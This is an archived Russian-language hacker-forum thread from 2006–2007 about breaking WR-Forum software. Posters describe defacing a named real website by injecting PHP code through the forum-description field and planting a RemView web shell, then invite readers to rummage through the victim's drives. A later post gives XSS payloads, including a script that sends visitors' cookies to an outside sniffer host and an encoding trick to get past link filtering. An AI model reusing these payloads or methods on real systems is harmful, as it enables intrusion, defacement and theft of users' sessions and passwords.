Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Дефейс через форум WR-Forum © 1.7 M (https://forum.antichat.xyz/showthread.php?t=19249)

Brun 17.05.2006 17:18

Дефейс через форум WR-Forum © 1.7 M
 
Значит дефейс делал не я а знакомый (don_Pedro)
Глюк форума - неправильная проверка названия темы. В назание темы можно написать
PHP код:

"; phpinfo(); "123 

Но без
PHP код:

<? ?>

Таким же макаром был вставлен шелл ремвью.

Результат http://www.klipov.net/forum/
http://www.klipov.net/remview.php
Подпись http://www.klipov.net/ :D

По названию видно что клипов там нет. Поэтому заходим на диск D: E: Z: и берём там неклипы, нефильмы и т.д.

Просиба не хамить там (не вы же старались). Ну разве чуть-чуть.

don Pedro 17.05.2006 18:05

ну Brun немножно сухо написал.... попробую добавить...
Сначала вытянул пас админа (это другая история :D )
так вот, залез в админку.... подумал как залить шел.... Форум, сразу скажу совковый, нет ниодной опции чтобы залить туда какой-нить файл...
нарыл интересную опцию "описание форума"
Попробовал вставить туда
PHP код:

<? phpinfo(); ?>

не порулило :(
потом начал думать.... в каком виде может сохранятся это описание.... скорее всего это происходит так
PHP код:

$opisanie="opisanie etogo foruma"

это наводит на одну мысль... если форум совковый, так может творцы сего форума не удосужились проверять строку описания, а? :)
ну попробовал ввести вот-так
PHP код:

"; phpinfo(); "123 

тут немножко обьясню ход мысли...
сначала нам надо сообщить РНР, что переменная, в которую записывается описание форума уже "закончилась". вот для этого ставим
PHP код:

"; 

дальше понятно,
PHP код:

phpinfo(); 

:D
и последний штрих
PHP код:

"123 

это чтобы не возникло приблизительно вот такой ошибки
Цитата:

Parse error: parse error, unexpected $ in ...
так как в нас остались два символа
PHP код:

"; 

которые сначала закрывали переменную с описанием форума....
проверил - работает...... ну если работает, то что нам мешает вместо любимого
PHP код:

phpinfo(); 

втулить туда код шела? :)
кто-то скажет: ведь длина описания наверно регулируется... а фиг вам, таварисчи, если творцы форума ламеры, то они ламеры во всем :D
вставил код шела, перед этим убрал
PHP код:

<? и ?>

заработало :)
вот так вот :)
ЗЫЖ а шо это я под ником don_Pedro не смог зарегицца? :( вродь нет такого юзера....

nix 18.05.2006 04:37

Не тот сайт ломал блин :d , там медленно качается 9кб/с

Кстати там XSS есть ?

don Pedro 18.05.2006 10:32

2nix
а хз, не проверял, кстати, ты хоть смотрел на тот сайт?? :)
прикол в том, что делал его один мего-ламер, хостится это все дело у него на компе дома, кажись в Испании, на винде... а ща самое интересное.... НА ДЕНВЕРЕ :D
кстати он типа пропалил.. ну ниче, еще что-нить найдем :D

c411k 18.05.2006 11:35

Цитата:

Сообщение от don Pedro
кстати он типа пропалил.. :D

ха, если бы не ставил "типа" деф, то все было бы нормально..

Li4inka 18.05.2006 11:39

точнее там идет преобразование функцией eval, без экранирования "

degeneration x 18.05.2006 13:12

Цитата:

вставил код шела, перед этим убрал
PHP код:

<? и ?>

заработало :)
вот так вот :)
А зачем туда вставлять код? Гораздо удобнее сделать include. :D

don Pedro 18.05.2006 13:14

не ну да, но...... поперло :)
тем более... не хакер я :rolleyes:
разве шо чуть-чуть :D

DCRM 18.09.2007 23:49

Напишу мини-мануал-историю (надо же мне на этом форуме с чего то начинать!)

На форуме WR-Forum © 1.8 совершенно нет проверки на html у себя в подписи... да что там в подписи, вообще практически нигде нету! ;)

Дело было где то часа в 2 ночи... думаю... проект новенький, интересный! есть раздел по JavaScript где мне могут помочь! Но тут столкнулся с неприятностью... В нужном разделе показалось сообщение:
Цитата:

Количество допустимых тем в рубрике исчерпано.
Немного обидевшись решил создать где нить в другом разделе.. и что я увидел:
Код:

index.php?fid=8&newtema=add
Дай ка думаю номер нужного раздела поставлю... и уваля! Работает! вот так и обходим ограничение тем :)
М... понравилось! решил поиграть с форумом)


гыгы) автор скрипта-редиска!
Код:

index.php?fid=9999&newtema=add
Далее, ввёл номер форума которого нету... и... он есть, наверно "скрытый" раздел...
index.php?fid=x
x-любая цифра :)

хех... ещё при добавлении сообщения можно спокойно вернуться назад и ещё раз добавить мессагу) короче оспамить легко!

А теперь самое интересное... XSS
У себя в инфе в подписи, да и в других полях анкеты делайте что хотите! =)

Хотим что бы жуткий аллерт досаждал посетителям?
Пишем у себя в статусе:
Код:

<IMG SRC=JaVaScRiPt:alert('XSS by DCRM')>
Хотите стырить куки?
Возьмём к примеру снифер:
Код:

http://s.netsec.ru/
Далее подумав, делаем так:
Код:

<script>img.src = "'http://s.netsec.ru/ваш логин.gif?'+document.cookie;"</script>
Но у автора стоит ограничение на длину сообщения... кхм... поиграем по его правилам, не долго думая сделал файлик скрипта и залил к себе на хост... => всё да ничего, но у автор форума сделал замену тексту ссылок на хреф... и это не проблема, достаточно лишь закодировать 1ю букву адреса:
Код:

<SCRIPT SRC="http://%77ww.xxx.xx/x.xx"></script>
И уваля! остаётся только ждать... ;)

И того, это первый мой интересный взлом) спасибо за внимание! :D

P.s. а дальше дело техники и воображения) Админ есть... куки есть, кстати в незашифрованном виде там пассы... ;)


Время: 10:31